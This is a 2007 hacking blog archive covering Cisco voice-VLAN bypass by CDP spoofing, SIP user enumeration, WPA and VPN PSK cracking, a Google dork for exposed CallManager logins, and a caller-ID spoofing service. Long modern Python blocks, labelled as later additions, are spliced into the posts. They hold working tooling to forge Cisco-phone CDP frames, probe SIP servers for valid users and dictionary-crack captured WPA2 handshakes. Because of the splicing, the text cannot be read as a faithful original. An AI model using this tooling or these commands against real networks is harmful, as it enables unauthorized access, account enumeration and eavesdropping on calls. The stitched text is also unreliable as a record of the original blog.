Saturday, March 31, 2007

Cisco 802.1x Voice VLAN Authentication Bypass Vulnerability

Ok, last night I blogged about VoIP enumeration techniques, and it made me want to find exploits for Cisco products. I was reading Jake's report, and I must admit the guys at FishNet Security write excellent reports. In the report, he mentioned that it is possible to bypass 802.1x port-based security by spoofing CDP packets, allowing an attacker to gain access to the voice VLAN. Below is a short summary:

"Cisco switches are susceptible to an authentication bypass vulnerability, allowing attackers to gain anonymous access to the voice VLAN.

Attackers may spoof CDP packets, and impersonate a Cisco IP phone, in order to anonymously join the voice VLAN. This allows attackers to gain access to network resources without the expected 802.1x authentication sequence. As network administrators expect that switch port access is restricted to only authenticated users, a false sense of security may pervade.

Once attackers gain access to the voice VLAN, they may be able to launch further attacks against servers and other hosts, or eavesdrop on VOIP conversations. Further network attacks are also possible at this point."

I guess the authentication mechanism behind it is the Extensible Authentication Protocol. Please go through the whole report; it is so good that it made me read it twice. The report covers the spoofing technique, the attack scenario and the mitigation steps. The full report can be found here

As for spoofing CDP packets, you can use a tool called Yersinia. This tool has multiple uses, one of which is taking over the STP root role. Installing this tool was a pain for me, with the usual ./configure, make, make install. However, I found a good site which lets you download the package and install it with dpkg -i yersinia_0.7.1-0.2_i386.deb. The link to the site is: http://www.enrici.com/debian/yersinia/0.7.1/. Below are pictures of the Yersinia tool. You can use it in GTK mode or with the ncurses interface.
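To make concrete what the spoofed announcement actually consists of, here is an added example in Python (not code from the post, from the FishNet report or from Yersinia). It builds the CDPv2 frame a tool would send to claim "I am a Cisco IP phone", and parses CDP frames back into their fields so you can run the same check over captured traffic and flag phone claims arriving from hosts that should not be phones. The TLV type codes and capability bits are taken from the Wireshark CDP dissector, the MAC addresses and device strings are made up, and the checksum routine only handles even-length payloads (Cisco uses a quirky variant for odd lengths):

```python
import struct

# Constructed example, not code from the post or from Yersinia. It shows what a CDP
# announcement claiming to be a Cisco IP phone consists of, and parses such frames so
# you can spot phone claims coming from hosts that should not be phones.

CDP_MULTICAST = bytes.fromhex("01000ccccccc")          # destination MAC used by CDP
SNAP_CDP = bytes.fromhex("aaaa03") + bytes.fromhex("00000c") + struct.pack("!H", 0x2000)

# TLV type codes and capability bits as decoded by Wireshark's CDP dissector
# (assumption: taken from the dissector, not from the original post).
TLV_DEVICE_ID, TLV_PORT_ID, TLV_CAPABILITIES, TLV_PLATFORM = 0x0001, 0x0003, 0x0004, 0x0006
CAP_HOST, CAP_VOIP_PHONE = 0x10, 0x80


def cdp_checksum(data: bytes) -> int:
    """Internet (ones' complement) checksum over the CDP header and TLVs.
    Cisco uses a variant for odd-length payloads that is not implemented here."""
    if len(data) % 2:
        raise ValueError("odd-length CDP payload: Cisco-specific checksum variant not handled")
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _tlv(tlv_type: int, value: bytes) -> bytes:
    # CDP TLV: 2-byte type, 2-byte length (including this 4-byte header), value
    return struct.pack("!HH", tlv_type, len(value) + 4) + value


def build_cdp_frame(src_mac: bytes, device_id: str, port_id: str, platform: str,
                    capabilities: int, ttl: int = 180) -> bytes:
    """Build an 802.3/SNAP frame carrying a CDPv2 announcement with the given TLVs."""
    body = (_tlv(TLV_DEVICE_ID, device_id.encode())
            + _tlv(TLV_PORT_ID, port_id.encode())
            + _tlv(TLV_CAPABILITIES, struct.pack("!I", capabilities))
            + _tlv(TLV_PLATFORM, platform.encode()))
    header = struct.pack("!BBH", 2, ttl, 0)              # version 2, TTL, checksum placeholder
    cdp = struct.pack("!BBH", 2, ttl, cdp_checksum(header + body)) + body
    # 802.3 length field covers the LLC/SNAP header plus the CDP payload
    return CDP_MULTICAST + src_mac + struct.pack("!H", len(SNAP_CDP) + len(cdp)) + SNAP_CDP + cdp


def parse_cdp_frame(frame: bytes) -> dict:
    """Decode a CDP frame into its fields; raises ValueError if it is not CDP."""
    if frame[:6] != CDP_MULTICAST or frame[14:22] != SNAP_CDP:
        raise ValueError("not a CDP frame")
    cdp = frame[22:]
    version, ttl, _ = struct.unpack("!BBH", cdp[:4])
    try:
        checksum_ok = cdp_checksum(cdp) == 0      # a valid frame sums to zero with its checksum
    except ValueError:
        checksum_ok = None                        # odd length: cannot verify here
    info = {"src_mac": frame[6:12].hex(":"), "version": version, "ttl": ttl,
            "checksum_ok": checksum_ok, "capabilities": 0}
    pos = 4
    while pos + 4 <= len(cdp):
        tlv_type, tlv_len = struct.unpack("!HH", cdp[pos:pos + 4])
        if tlv_len < 4 or pos + tlv_len > len(cdp):
            raise ValueError("malformed TLV")
        value = cdp[pos + 4:pos + tlv_len]
        if tlv_type == TLV_DEVICE_ID:
            info["device_id"] = value.decode(errors="replace")
        elif tlv_type == TLV_PORT_ID:
            info["port_id"] = value.decode(errors="replace")
        elif tlv_type == TLV_PLATFORM:
            info["platform"] = value.decode(errors="replace")
        elif tlv_type == TLV_CAPABILITIES and len(value) == 4:
            info["capabilities"] = struct.unpack("!I", value)[0]
        pos += tlv_len
    return info


def claims_to_be_phone(info: dict) -> bool:
    """True if the announcement presents itself as a Cisco IP phone, which is exactly
    the claim a switch acts on when it places the port into the voice VLAN."""
    return bool(info["capabilities"] & CAP_VOIP_PHONE) or info.get("platform", "").startswith("Cisco IP Phone")
```

Run over a packet capture, the parser gives you the source MAC next to the claimed platform; a "Cisco IP Phone" platform or the VoIP Phone capability bit coming from a MAC you know belongs to a workstation is the signature of the bypass described in the report, and is something the switch itself cannot tell apart from a real phone.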



BotMaster Spamming



Does generating mass traffic to your site in a small amount of time equal spamming? Ok, I just came across this tool from botmaster.net. Personally, I wouldn't use this tool at all. What if someone reports me to the authorities? Or what if someone proxy-forwards all the traffic to an FBI web form? On the other hand, you can earn money by telling someone that you can help his or her site rank no. 1 in Google, but that is conning to me. I once had a colleague who wanted his site to rank no. 1 in Google so badly that he was willing to pay USD $2000 for a service. That is crazy money for a claim made by any company. Well, I don't trust all these so-called "SEO services" either. They either con you and say bye-bye, or they drag the process out to make you rank no. 1 in Google. I will let you think about what this tool can do for you, good or bad. Let me know?

For more on how to prevent yourself from being compromised by this tool, visit below:
sla.ckers

For the demo of this tool and how it can be used, visit below:
http://www.botmaster.net/movies/XFull.htm
http://www.botmaster.net/movies/XDemo.htm

Friday, March 30, 2007

VoIP Enumeration Technique released

Ok, I finally managed to finish my VoIP enumeration experiments and now it is time to blog them here. I know it has been long awaited, but I was rather busy with other things too. Before I start, I presume that most of you reading my blog have some basic knowledge of how SIP signaling works. There is a plethora of information on SIP signaling, so just Google it and you will find it. The site I visit most is iptel.org. In this experiment, the tools used are nmap, siVus, sipsak, SER (as the PBX), Debian, netcat, the SolarWinds toolset, the X-Lite softphone and Wireshark.

Enumeration is the most important step in any hacking activity. Without successful enumeration you would not know whether a PBX server is running or what other services are listening, so successful enumeration leads to a successful hack. I guess most of you know about the three-way TCP handshake. Nmap can be used to perform SYN, ACK, Xmas, connect and other TCP scans, but SIP normally runs over UDP port 5060, so those TCP scan types do not apply: a UDP scan (nmap -sU) can tell you the port is open and nothing about the users behind it. For VoIP the best open source tools to use are sipscan or perhaps siVus. There are three different request types that can be used for VoIP enumeration: INVITE, OPTIONS and REGISTER. You have to know how the exchange takes place for all three. Different request types yield different results, and if the PBX server is hardened or patched, enumeration becomes a little trickier.

I had managed to set up a SER PBX server without any MySQL authentication. This is for testing purposes only. The Session Initiation Protocol works quite similarly to HTTP: you send requests and get responses. The requests can be INVITE, REGISTER, OPTIONS, SUBSCRIBE, NOTIFY, REFER, CANCEL or BYE, and the response carries a numeric status code like 100, 180, 200, 302, 408, 500 or 603, among many others. For a full list please refer to iptel's website. A successful request ends with a 2xx final response, normally 200 OK; 1xx codes such as 100 Trying and 180 Ringing are provisional and are always followed by a final response, so take note of that. For the screenshot below, I successfully sent an INVITE request and you can see in Wireshark how the exchange takes place.

This tells us that the user exists on the PBX server; otherwise a 404 Not Found would be returned, and on a server that requires credentials you would see a 401 Unauthorized (or 407 Proxy Authentication Required) challenge instead of the 200. Try this: set up MySQL authentication and you will no longer see a 200 response to the bare request.

Below is a screenshot of a REGISTER request. Notice that the exchange is different from the INVITE request.

A REGISTER request binds a user's address-of-record (the username at the SIP domain) to a contact address at the registrar. Credentials are not stored by REGISTER; they are presented in an Authorization header only when the registrar challenges the request. So, as shown above, the PBX server allowed me to register without being challenged.

You can use the serctl ul show command to see the list of registered contacts (the user location table) as shown below:

I had registered two users, Ronald and test.

On the softphone side, if the PBX is set up correctly, all you have to do is launch the softphone and it will register itself with the SER location database (without authentication in my experiment). The softphone is easy to configure; you just have to enter the correct settings. Below is a successful registration of the softphone to the PBX server.


To start the SER service, run sudo /etc/init.d/ser start (the init script name is lowercase, and Linux paths are case-sensitive). Once the service is started, you will see some text as shown below:


To check that the SER process is running on Debian, use ps -ef | grep -i ser as shown below (the -i matters because grep is case-sensitive and the process name is lowercase):


To monitor the responses emitted by the PBX server, issue the serctl moni command as shown below:

From the output you can clearly see the highlighted 2xx counter. It shows that two requests had been handled at the time of testing and both were accepted. All the other counters (3xx, 4xx, 5xx and 6xx) are 0, which means no bad requests were sent to the PBX server and so it has not emitted any error responses.

Ok, now comes the enumeration technique. I used netcat to see whether I could get any response from the server. From the output of netcat, sad to say, there was no response from the server. Either I typed it wrongly or the server is configured by default not to respond. A snippet of netcat is shown below:


siVus was used next to scan the PBX server. The result only displays the port number and the User-Agent (UA), which is the X-Lite softphone. It does not show the version or the software of the PBX server.


Sipscan was next. Because there is no authentication set up on the PBX server, all the responses sipscan received were 200 OK. This means that if an attacker knows the IP of my PBX server, all he needs is a softphone: he can register without any password and start using the VoIP service. Of course, in a real-world scenario most PBX servers are set up with passwords. My point here is that because my PBX server is set up without authentication, all you see is 200 OK responses.

If a PBX server is set up with passwords, then depending on which request you send (INVITE, REGISTER or OPTIONS) you will see 4xx responses instead, and the difference between them is what lets you enumerate accounts: a 401 Unauthorized (or 407 Proxy Authentication Required) tells you the user exists and requires authentication, while a 404 Not Found tells you it does not (on some proxies it can also mean the user exists but is simply not registered, so treat it with care). Having a confirmed username is good enough: you have successfully enumerated a user in the database. Doing this by hand is a long process, but you can write a script to automate it, or use sipscan, which comes with a default user list that you can extend to perform a dictionary scan. Below is a snippet of sipscan:
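The scripted version of the enumeration loop described above, as an added example that is not part of the original post and not sipscan's or sipsak's code. It builds well-formed OPTIONS/REGISTER/INVITE requests (every line CRLF-terminated, a Via with the z9hG4bK branch cookie, a Content-Length and a terminating blank line, the details that a hand-typed request in netcat usually misses), parses the status line and headers of the reply, and classifies the final response into what it tells you about the user. The local address 192.168.1.50 in the Via and Contact headers is an assumption, and the three sample responses are constructed, modelled on what a SER registrar sends back; only those samples are exercised offline, the probe() function is the one you would point at a real PBX:

```python
import socket
import uuid

# Constructed example, not code from the post, sipscan or sipsak. Assumed values:
# the local address used in Via/Contact, and the sample responses at the bottom.

LOCAL_IP, LOCAL_PORT = "192.168.1.50", 5060


def build_request(method: str, user: str, host: str, port: int = 5060) -> bytes:
    """Minimal but well-formed SIP request. Every line must end in CRLF and the message
    must end with an empty line plus Content-Length, or most servers silently drop it."""
    branch = "z9hG4bK" + uuid.uuid4().hex[:16]          # RFC 3261 magic cookie prefix
    # REGISTER is addressed to the domain; the other methods to the user being probed
    request_uri = f"sip:{host}:{port}" if method == "REGISTER" else f"sip:{user}@{host}:{port}"
    lines = [
        f"{method} {request_uri} SIP/2.0",
        f"Via: SIP/2.0/UDP {LOCAL_IP}:{LOCAL_PORT};branch={branch};rport",
        "Max-Forwards: 70",
        f"From: <sip:{user}@{host}>;tag={uuid.uuid4().hex[:8]}",
        f"To: <sip:{user}@{host}>",
        f"Call-ID: {uuid.uuid4().hex}@{LOCAL_IP}",
        f"CSeq: 1 {method}",
        f"Contact: <sip:{user}@{LOCAL_IP}:{LOCAL_PORT}>",
        "User-Agent: sip-enum-example/0.1",
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_response(raw: bytes):
    """Return (status_code, reason, headers) from a SIP response; header names lowercased."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("utf-8", errors="replace")
    status_line, *header_lines = head.split("\r\n")
    parts = status_line.split(" ", 2)
    if len(parts) < 2 or not parts[0].startswith("SIP/2.0"):
        raise ValueError(f"not a SIP response: {status_line!r}")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(parts[1]), (parts[2] if len(parts) > 2 else ""), headers


def classify(method: str, code: int) -> str:
    """What a response to an enumeration probe tells you about the target user.
    Interpretations depend on the server's configuration; treat them as hints."""
    if 100 <= code < 200:
        return "provisional: wait for the final response"
    if 200 <= code < 300:
        return "accepted without a challenge" if method == "REGISTER" else "user reachable"
    if code in (401, 407):
        return "user exists: server demands credentials"
    if code == 403:
        return "user known but request forbidden (or server rejects all probes)"
    if code == 404:
        return "user unknown (on some proxies: exists but not registered)"
    if code == 480:
        return "user exists but is not registered right now"
    return f"unclassified final response {code}"


def probe(method: str, user: str, host: str, port: int = 5060, timeout: float = 2.0):
    """Send one request over UDP and return (code, reason, headers) of the first final
    response, or None on timeout. Not exercised by the offline samples below."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_request(method, user, host, port), (host, port))
        try:
            while True:                               # skip 1xx provisional responses
                data, _ = sock.recvfrom(65535)
                code, reason, headers = parse_response(data)
                if code >= 200:
                    return code, reason, headers
        except socket.timeout:
            return None


# Constructed responses modelled on what a SER registrar sends back.
SAMPLE_RESPONSES = {
    "open_registrar": b"SIP/2.0 200 OK\r\nContact: <sip:test@192.168.1.50:5060>;expires=3600\r\nContent-Length: 0\r\n\r\n",
    "challenge": b"SIP/2.0 401 Unauthorized\r\nWWW-Authenticate: Digest realm=\"192.168.1.23\", nonce=\"4601e8a9\"\r\nContent-Length: 0\r\n\r\n",
    "unknown_user": b"SIP/2.0 404 Not Found\r\nContent-Length: 0\r\n\r\n",
}


def enumerate_samples(method: str = "REGISTER") -> dict:
    """Classify each constructed response the way the enumeration loop would."""
    result = {}
    for name, raw in SAMPLE_RESPONSES.items():
        code, reason, headers = parse_response(raw)
        result[name] = (code, classify(method, code), headers.get("www-authenticate", ""))
    return result
```

The realm pulled out of the WWW-Authenticate header is worth recording alongside each enumerated user: it is the value you will need for the digest computation if you later attempt a password guess, and a registrar that challenges every REGISTER regardless of user (some do) shows up as every probe landing in the same "user exists" bucket, which is your cue to switch to INVITE or OPTIONS probes where the 404/480 distinction still applies.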


Sipsak is known as the SIP "swiss army knife" and blends well with SER and the X-Lite softphone. The options I use for sipsak are as below:

Send an OPTIONS request to test@192.168.1.23 and display received replies.

sipsak -vv -s sip:test@192.168.1.23


Trace the SIP path to test@192.168.1.23

sipsak -T -s sip:test@192.168.1.23


Insert a forwarding contact for myself at work (WW) pointing to me at home for one hour, authenticating with the password if required.

sipsak -U -C sip:WW@home -x 3600 -a password -s sip:WW@192.168.1.23


A usrloc test with additional INVITEs sent to the user.

sipsak -U -I -s sip:test@192.168.1.23 -vv


Send the instant message "Hell time!" to the colleague and show the result:

sipsak -M -v -s sip:test@192.168.1.23 -B "Hell time!"

To update your hacking toolset you can visit this page: http://www.forinsect.de/pentest/pentest-tools.html

Of course, you can perform more VoIP hacks; enumeration is just one part of it. To see more VoIP hacking tools and their purposes, check this site out:
http://www.voipsa.org/Resources/tools.php. It has a whole suite of tools for VoIP, and each section has a different specific use.

A point to note: please disable SNMP on VoIP devices unless you really need it. If you must use SNMP, set strong, unguessable read-only and read-write community strings (never the defaults public and private), or better still use SNMP version 3, which provides per-user authentication and, in authPriv mode, encryption of the traffic. Below is a snippet of SolarWinds. You can use SolarWinds to look up the MIB and the OIDs for a specific vendor; once the vendor is identified, a wealth of information is disclosed. All of this works only because the device still answers to the default public community string, so keep that in mind.


Lastly, do you know that hardware VoIP phones download their configuration files (and often their firmware images) from a TFTP server when they boot? Most of us know that TFTP runs on UDP port 69 and provides no authentication. So what if you can compromise the TFTP server? You can then plant modified configuration or firmware files that the phones will load on their next boot. If you ask me how to find the TFTP server's IP address, you can check the phone's settings menu; normally one of the options shows the TFTP server IP address. The Cisco IP Phone 7940 and 7960 do show it; see my previous post. The best protection is to restrict access to the TFTP server with an access list that permits only the phones' IP addresses (or the voice VLAN) to reach it.

Well, there is more than just enumeration, and this is just the beginning of VoIP hacking, or phreaking as you can call it. Once a valid username is found, you can perform MITM sniffing to capture voice calls, and as my previous post shows, you can actually reroute calls. That is all for now. I hope you like it. Let me know what you think?

Cisco PIX Firewall capture command

Ok, so most of us know packet sniffers like tcpdump and Wireshark, the two best open source sniffers freely available today. Most of us also know that the majority of companies now use switches rather than the good old hub, because a hub repeats every frame out of every port. To sniff all traffic on a switched network you need a mirror (SPAN) port or you have to resort to ARP spoofing, whereas on a hub you just install your sniffer on your machine and start capturing. For Cisco switches you can enable Dynamic ARP Inspection, which validates ARP packets against the DHCP snooping binding table and drops spoofed ones. Personally, I have not tried it, but you can read more about it here: http://www.cisco.com/en/US/products/hw/switches/ps708/products_configuration_guide_chapter09186a00804357b1.html

My point today is not ARP spoofing; instead I would love to talk about the capture command on the PIX firewall. This command functions almost like a sniffer: you can capture all the traffic that traverses the firewall, and you can also filter by IP address and port number. Moreover, the command is very handy for troubleshooting when you set up multiple servers or networks. Personally, I tried it two years back when I was configuring a firewall, and there is no question that having a sniffer-like command on the firewall is a great thing. I shan't go deep into the details of how to use or configure this command, because a simple yet detailed article has already been published. Let me know what you guys think?

http://www.computernetworkinghelp.com/content/view/40/1/

Telespoof

Ok, this is my 50th post and I am going to introduce a service called caller ID spoofing. I have known about this service for a few months, but it just came to mind that I had to blog it. Personally, I have not tried it before, so I can't really comment on it. From reading the FAQ, it is cheap, anonymous and, best of all, simple. Imagine this: calling without anyone knowing your real number? What can you do with it? hehehe, I will let you guys run your wild imagination...


http://www.telespoof.com

Thursday, March 29, 2007

Cracking Wireless Network

Ok, I bet most people know how to break into wireless networks, but it is still good to post it here. The software I am going to use is Aircrack-ng, because it is open source, fast and has a suite of tools that can perform a hell of a lot of tasks. In order to sniff and break wireless networks, you need to put your wireless card into monitor mode (not promiscuous mode, which only applies to frames on a network you are already attached to) with airmon-ng, then capture with airodump-ng. For WEP you need a sufficient number of Initialization Vectors; for how many IVs to capture, see the aircrack-ng website. Cracking WEP is as simple as 1-2-3 as long as you have enough IVs, because the key is recovered statistically from the IVs alone. WPA/WPA2-PSK is different: there are no weak IVs, and what you need is a capture of the 4-way handshake between a wireless client and the access point. If no client is about to connect, you use aireplay-ng to send deauthentication frames, which forces an associated client to reauthenticate and replay the handshake for you. Once you have the handshake, aircrack-ng can only run a dictionary attack against it, so the strength of the passphrase decides whether it falls. For more information, please read the FAQ at http://www.aircrack-ng.org/doku.php?id=faq. Make sure you go through it.
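Why the handshake capture matters for WPA, shown in code: this is an added example in Python, not aircrack-ng's code and not from the original post. It derives the PMK from a passphrase with PBKDF2 and the PTK with the 802.11i PRF exactly as a client does, recomputes the MIC on EAPOL message 2 of the 4-way handshake, and runs a dictionary over it; a guess is correct when the recomputed MIC equals the captured one, which is all aircrack-ng is doing once it has the handshake. Everything "captured" here is fabricated inline (SSID, MACs, nonces, wordlist, and an EAPOL-Key message 2 signed under the planted passphrase); WPA2 with the HMAC-SHA1-128 MIC (key descriptor version 2) is assumed, with WPA/TKIP's HMAC-MD5 variant included for completeness:

```python
import hashlib
import hmac
import struct

# Constructed example, not aircrack-ng code. It shows why the 4-way handshake is what
# you need for WPA/WPA2-PSK: the MIC on EAPOL message 2 can be recomputed for each
# passphrase guess offline. Assumed: WPA2 (key descriptor version 2, HMAC-SHA1 MIC);
# the SSID, MACs, nonces and wordlist below are made up.

MIC_OFFSET = 81    # EAPOL hdr 4 + type 1 + key info 2 + key len 2 + replay 8 + nonce 32 + IV 16 + RSC 8 + ID 8
NONCE_OFFSET = 17  # EAPOL hdr 4 + type 1 + key info 2 + key len 2 + replay 8


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096, 32); the iterations are the cost per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512 over the sorted MAC pair and the sorted nonce pair."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, key_version: int) -> bytes:
    """MIC over the EAPOL-Key frame with its own MIC field zeroed; KCK is the first 16 PTK bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if key_version == 1:                                       # WPA/TKIP
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]   # WPA2/CCMP


def build_msg2(snonce: bytes, key_version: int) -> bytes:
    """EAPOL-Key message 2 (client -> AP) with the MIC field zeroed and no key data."""
    key_info = 0x0100 | 0x0008 | key_version   # MIC present, pairwise key, descriptor version
    body = (struct.pack("!BHH", 2, key_info, 0) + b"\x00" * 8 + snonce       # type, info, len, replay, SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8                        # IV, RSC, key ID
            + b"\x00" * 16 + struct.pack("!H", 0))                            # MIC placeholder, key data len
    return struct.pack("!BBH", 1, 3, len(body)) + body                        # EAPOL v1, type 3 = Key


def mic_matches(passphrase, ssid, ap_mac, sta_mac, anonce, eapol, key_version) -> bool:
    snonce = eapol[NONCE_OFFSET:NONCE_OFFSET + 32]
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, eapol, key_version), eapol[MIC_OFFSET:MIC_OFFSET + 16])


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, eapol, key_version):
    """Dictionary attack: first passphrase whose recomputed MIC matches the capture, else None."""
    for guess in wordlist:
        if mic_matches(guess, ssid, ap_mac, sta_mac, anonce, eapol, key_version):
            return guess
    return None


def build_demo_capture(passphrase: str = "correct horse battery") -> dict:
    """Fabricate what airodump-ng would have captured, with message 2 signed under the real passphrase."""
    cap = {"ssid": "lab-wlan", "ap_mac": bytes.fromhex("001122334455"),
           "sta_mac": bytes.fromhex("66778899aabb"), "anonce": bytes(range(32)), "key_version": 2}
    snonce = bytes(range(32, 64))
    eapol = build_msg2(snonce, cap["key_version"])
    kck = derive_ptk(pmk_from_passphrase(passphrase, cap["ssid"]),
                     cap["ap_mac"], cap["sta_mac"], cap["anonce"], snonce)[:16]
    mic = eapol_mic(kck, eapol, cap["key_version"])
    cap["eapol"] = eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]
    return cap


def demo():
    cap = build_demo_capture()
    wordlist = ["password", "letmein123", "correct horse battery", "qwerty12"]   # constructed
    return crack(wordlist, cap["ssid"], cap["ap_mac"], cap["sta_mac"], cap["anonce"],
                 cap["eapol"], cap["key_version"])


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two things fall out of the code that the paragraph alone does not show: the ANonce, SNonce and both MACs are inputs to the key, so a handshake capture has to include message 1 (ANonce) and message 2 (SNonce plus MIC) or it is useless, which is why aircrack-ng insists on a complete handshake; and the 4096 PBKDF2 iterations are paid per guess per SSID, so the attack is only practical against passphrases that appear in a wordlist.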

Googling Cisco Call Manager and Extra VLAN config

Ok guys, this is the final series of VLAN configurations I made. Until I make new discoveries, enjoy these:


Configuring VLAN 10 on multiple interfaces.


Configuring a dynamic trunk (DTP) on multiple interfaces. Please note that this is not secure: an attacker's host can negotiate a trunk with the switch and hop into other VLANs.


Configuring Telnet on the switches. By now EVERYONE knows it is very insecure, since the credentials and the whole session travel in cleartext. Use SSH instead.


Configuring IP address on the vlan interface.

Ok, as I am still working on the VoIP testing methodology for you guys, I happened to stumble across this:

This is bad practice, but only 4 companies turned up in the Google results. The search string is inurl:"ccmuser/logon.asp"

Wednesday, March 28, 2007

VoIP Auditing Tools

Ok, so I am going to attend a hacking course at Hack In The Box with The Grugq. Yes guys, I do know how to audit VoIP, but I would love to learn advanced VoIP hacking from the best of the west. If you read the HITB website, he developed a tool called Tactical VoIP Toolkit which performs basic and advanced attacks. Just a few minutes ago I found another commercial tool called VoIPaudit, which costs USD $10,000. Personally, I feel that open source tools are much, much better than closed source ones. I don't know how this tool fares, but I think it is way too pricey to buy. Well, you can get it from here if you have the money to spare. I will update you once I try the tool from The Grugq. And yes, I am still working on basic VoIP auditing on my PBX right now; I have captured screenshots and am going to release them here once I am done. Let me know what you guys think?

TCNiSO Modem Hacking

Ok, I almost forgot about DerEngel for some time now. I was reading his book "Hacking the Cable Modem" two months back and I was really amazed by how the small things he found led to bigger hacks. The book is very insightful and teaches you how to solder and how to hack modems. Well, I am not good at reverse engineering, programming or soldering. However, this book really made me look into how "real" hackers actually work. In the end, it all boils down to teamwork for a successful hack. Buy this book if you are interested in modem hacking, or visit his website at http://www.tcniso.net/. You can find videos and other extra stuff that you won't find elsewhere. Below is a small image of the book and an excerpt.



"When shopping for cable modems, you'll come across several different kinds. Almost all cable modems available in retail stores are DOCSIS-certified, which means that they will work on the network of any Internet service provider that supports DOCSIS. Most new cable modems come with an Ethernet port, a coaxial connector, and a Universal Serial Bus (USB) interface. More expensive models may come with additional features, such as Voice over IP (VoIP) support or a wireless access point (WAP)." From chapter 2, The Cable Modem Showcase

Yet Another Content Generator

Ok guys, listen up. If you have a site and would love to boost its content, please try YACG. It is open source, which means it is free. You can also include your own scripting code if you know how to code, and best of all it is easy to use and you can customize it. Check it out here: http://getyacg.com

"It's based on hooks so you can add your own code without having to change anything, also it's very intuitive. For example, if you have a page about 'Ferrari' and you put the script will automatically display a video from Youtube related to 'Ferrari'. There are a lot of hooks like that, and more being developed!"

Testing for Cisco VPNs


Note: image from ike-scan wiki

Ok guys, I know ike-scan has been out there for some time, but I still would love to blog about it. IKE, the key-exchange protocol of IPsec VPNs (Cisco's included), runs on UDP port 500, and most of us know that the Cisco VPN 3000 Concentrator has been vulnerable to multiple attacks such as DoS and buffer overflows. ike-scan tests for the presence of an IKE gateway, fingerprints it from its retransmission backoff pattern and vendor IDs, and checks whether it accepts Aggressive Mode with pre-shared-key authentication. In Aggressive Mode the responder sends its authentication hash before the initiator has proved anything, so the hash can be captured and cracked offline with psk-crack; once the PSK is recovered, connecting to the gateway is no problem. Personally, I have tested multiple VPNs and only found a Cisco VPN 3000 Concentrator vulnerable. If you would love to know how to pen-test VPNs, check out the following articles:

http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide
http://www.securityfocus.com/infocus/1821

It will be very useful if you go through the whole article and understand how IPsec works. As a penetration tester, below are the few commands I always use at the command prompt:

C:\ikescan>ike-scan xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.531 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=3 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=1 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -sport=0 -auth=64221 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.484 seconds (0.40 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.468 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=00 xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --vendor=f4ed19e0c114eb516faaac0ee37daf2807b4381f xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

Ending ike-scan 1.9: 1 hosts scanned in 2.453 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify

C:\ikescan>ike-scan -multiline -sport=0 --trans=5,2,1,2 --aggressive xx.xx.xx.xx
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

